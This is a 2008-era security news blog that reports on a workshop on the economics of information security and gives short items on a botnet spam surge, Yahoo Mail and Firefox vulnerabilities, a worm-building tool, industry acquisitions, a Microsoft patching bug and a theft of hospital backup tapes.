In the last eight years or so, I’ve probably been to more than 100 security conferences, workshops, trade shows and seminars, and I’m hard-pressed to come up with one that’s been more informative or entertaining than the Workshop on Economics in Information Security that’s taking place at Dartmouth College this week. As you might expect, the workshop is focused heavily on economic issues that influence information security and is light on technology talk. The thing that struck me most about the sessions today is the number of people who are doing serious work on this topic. Security has historically been one of the last refuges of the hard-core techie, but some of the brightest minds in the industry are now focusing their energies on thinking about the ways in which security, economics and other disciplines intersect. A quick look around the audience found Ross Anderson of the University of Cambridge, Bruce Schneier, Stuart Schechter of Harvard University and Phil Venables of Goldman Sachs.

I had the privilege this morning of speaking on a panel, with my friends Ryan Naraine and Scott Berinato, as well as Byron Acohido of USA Today and Brian Grow of BusinessWeek, about the media’s role in communicating security information to the public. The session produced a number of really interesting discussions. One attendee asked how difficult it is for journalists to get information about attacks and defenses from the government and enterprises who have been affected. The short answer is: virtually impossible. I’ve had some success with this over the years, as have the other panelists, but the truth is that the public at large, as well as security professionals, are being poorly served by the severe lack of objective data on attacks, breaches and cybercrime. (More on that later.)
Ross Anderson brought up another important topic, which many reporters struggle with on a daily basis: how to walk the line between responsible reporting of attacks and vulnerabilities, and pure fear-mongering. It’s not an easy task, I’ll say that, but if you go too far down the scare-tactic road, people tune out pretty quickly, and that’s counterproductive for everyone. The reality is that many of the things we write about and you deal with every day ARE scary, and people should be afraid of them. Some level of fear is healthy in this business, but we are all better off without the gratuitous bogeyman-in-the-server stories that serve no purpose other than to turn off smart readers.

Bruce Schneier also raised a good question regarding the value of stories about attack and defense tactics versus those about the reasons those attacks are successful and the societal and organizational failures that lead to them. A lot of the value depends on the audience. Byron and Brian both made the point that their audiences are less interested in the deep technical aspects of security than the SearchSecurity or ZDNet audiences are, which is an important point. But while the technical details will always have a place in the stories we write here, the psychological, organizational and economic aspects of why security succeeds or fails should have a seat at the table as well.

A sharp rise in the volume of malicious spam this month can be largely attributed to the Srizbi botnet, according to researchers at Marshal. Spam intended to infect users’ computers with malware tripled in one week, jumping from 3% of total spam at the beginning of June to 9.9% the following week.

The Srizbi botnet currently is spewing out spam that tries to trick users into clicking on a link by including the first part of their email address in the subject line, and the suggestion that they look stupid in a video, according to Marshal. It’s also spoofing the Classmate.com service with emails that include a link to a fake Classmate.com page that instructs them to run a Flash video player. When users click on the link, they’re prompted to download an executable that infects their computers.

Phil Hay, lead threat analyst with Marshal’s TRACE team, called the Srizbi botnet “one of the biggest threats to Internet users today.” Marshal said the botnet is responsible for 46% of all spam.

Researchers at Cenzic discovered a vulnerability in Yahoo Mail that could allow attackers to steal Yahoo identities and potentially access users’ sensitive information.

The company, a Web application security provider based in Santa Clara, Calif., notified Yahoo of the cross-site scripting flaw in its popular Web mail program on May 23, and Yahoo fixed it on June 13.

The vulnerability requires the attacker to use Yahoo Messenger desktop application version 8.1.0.209 to chat with someone using the Messenger support in the latest version of Yahoo Mail. An attacker can make their chat status “invisible” and craft a malicious message; when he/she returns to the chat and the user clicks on the message, the malicious scripting is executed, said Mandeep Khera, Cenzic vice president of marketing.

The vulnerability could allow an attacker to access a Yahoo Mail user’s session ID and steal their Yahoo identity, which could expose sensitive information stored in their Yahoo account, according to Cenzic.

Cenzic researchers hadn’t heard of any actual attacks exploiting the vulnerability, but Khera said he wouldn’t be surprised if attackers had figured it out and were keeping it quiet. Attackers prefer to quietly exploit vulnerabilities for financial gain, he said.

The steady drumbeat of acquisitions in the security industry continues, with the latest deal being Proofpoint’s purchase today of email archiving provider Fortiva. The deal is another indicator of the shift toward on-demand security technologies. Proofpoint already offers its email security product as a hosted service, and Fortiva has an on-demand archiving service, as well. Although Proofpoint is probably best known for its email security appliances, which perform anti-spam, antivirus and DLP tasks, it also has a few on-demand offerings, it has been moving into the on-demand world as well.

The companies did not disclose the financial terms of the deal. But, they did say that the development and support for Fortiva’s products will stay in Toronto, and that it will continue to be sold through the channel. Email archiving has become a hot topic of late as e-discovery has come to the fore, and the on-demand model has advantages for companies without the money or capacity to store all of their email on their own premises.

TippingPoint said a researcher submitted a critical vulnerability affecting Firefox 3.0 to its Zero Day Initiative just five hours after Mozilla released the updated open source browser Tuesday.

In a blog post Wednesday, TippingPoint said its researchers verified the vulnerability in its lab and quickly reported the flaw to Mozilla’s security team. The flaw could allow an attacker to execute arbitrary code, but a user would need to click on a link in an email or visit a malicious Web page, according to TippingPoint. The vulnerability also affects prior versions of Firefox 2.0.x.

The company, a division of 3Com Corp., said it won’t release any other information about the vulnerability until a patch is available. Mozilla is working on a fix. TippingPoint’s Zero Day Initiative pays researchers for verified vulnerabilities.

Security researchers at antivirus vendor Panda Security have discovered an application that turns executable files into a worm that can spread and cause damage on infected machines.

The tool is so easy to use that researchers say very little technical knowledge is needed to pull off a successful attack. The worm can wreak havoc on an infected machine by disabling the Windows Task Manager, folder options and the system’s browser.

PandaLabs researcher Oscar Anduiza, said the tool has a number of features that can change the effectiveness and type of worm generated from the executable file. A hacker using the tool can also easily choose the infection date of the worm.

“The worms can be configured to display a message when they are run or activate themselves when Windows is started,” Anduiza said in a PandaLabs blog post.

Third Brigade, a host intrusion prevention software company, has acquired OSSEC, an open source, host-based IDS. The vendor said the OSSEC project will remain open source while it provides commercial support and training. Daniel Cid, the creator and primary developer of OSSEC, will work as principal researcher at Third Brigade.

OSSEC began as an open source project in 2003, and according to Third Brigade, has users in 40 countries including two of the largest U.S. commercial banks. HIDS software works on multiple platforms, including Windows, Solaris, Linux and MacOS. Third Brigade plans to incorporate OSSEC functionality into future products.

The deal comes nearly a year after Sourcefire acquired ClamAV, another open source security project. Sourcefire owns the rights to the open source Snort IDS, which was created by Sourcefire founder Martin Roesch.

UPDATE: Microsoft released a patch to apply to the System Center Configuration Manager 2007 servers to resolve the patching issues. Security Advisory 954474 has the details.

************
Microsoft continues to track a bug blocking the deployment of the June 2008 security updates. The software vendor said on Friday that an issue with the System Center Configuration Manager 2007, “affects the deployment of security updates to System management Server (SMS) 2003 clients.” Those on SMS 2003, using the Inventory Tool for Microsoft Updates, aren’t getting the security updates.

Microsoft issued an advisory telling customers that its engineers were working to correct the issue.

“In response to this issue, we’ve activated our Software Security Incident Response Process (SSIRP) and our engineering teams are working to develop a solution for this issue,” said Christopher Budd, a security program manager in the Microsoft Security Response Center (MSRC).

Microsoft issued three critical updates in June as part of its monthly batch of updates, plugging holes in Bluetooth and Internet Explorer that could be exploited by a hacker to run malicious code and gain access to a machine.

A former sales executive at virtualization vendor Citrix Systems Inc. will take over the helm at Sourcefire Inc.

Sourcefire said that John C. Burris will take over the CEO role of the company effective July 14. Burris was head of worldwide sales and services at Citrix. He replaces E. Wayne Jackson, who announced in February that he would step down from the top post. Jackson has remained on board until the company’s Board of Directors could choose a replacement.

Jackson oversaw an eventful 2007. The company went public in March 2007 after its acquisition of Check Point Software Technologies Inc. was fraught with concerns about the Israeli-owned Check Point buying a U.S. security firm. The acquisition was abandoned in 2006. Sourcefire also acquired the intellectual property of ClamAV, an open source antivirus project in August.

“During my six years at Sourcefire, we have grown from a small security start-up to one of the most respected companies in our industry,” Jackson said in a statement.

The company also revamped its strategy last year calling it Enterprise Threat Management. It still uses Snort, the open source packet-sniffer, as the backbone of the strategy. The company said the goal was to combine intrusion prevention, network behavior analysis and network access control with vulnerability assessment.

Analysts have said that Sourcefire’s challenge has been to differentiate itself against the likes of much larger competitors, Juniper Networks, Cisco Systems, ISS (now part of IBM Global Services and TippingPoint Technologies (now a division within 3Com).

The University of Utah Hospitals & Clinics said Tuesday that a metal box of backup tapes containing billing records for about 2.2 million patients and guarantors was stolen from a car belonging to a storage contractor’s employee.

The driver for Perpetual Storage violated the storage company’s policies for secure data transport, officials said. The theft, which occurred June 2, is under investigation by the Salt Lake County Sheriff’s Department, the FBI and the U.S. Postal Service. The University of Utah Hospitals & Clinics is offering a $1,000 reward for return of the tapes.

The billing records included patient names, demographic information and diagnostic codes. Records for a subset of 1.3 million patients also contained Social Security numbers.

Although officials said there is no evidence that the data on the tapes has been accessed, the health care system is notifying the affected individuals, providing them with credit monitoring, and taking additional steps to safeguard its records. It also suspended deliveries of backup tapes to Perpetual Storage pending a review of procedures.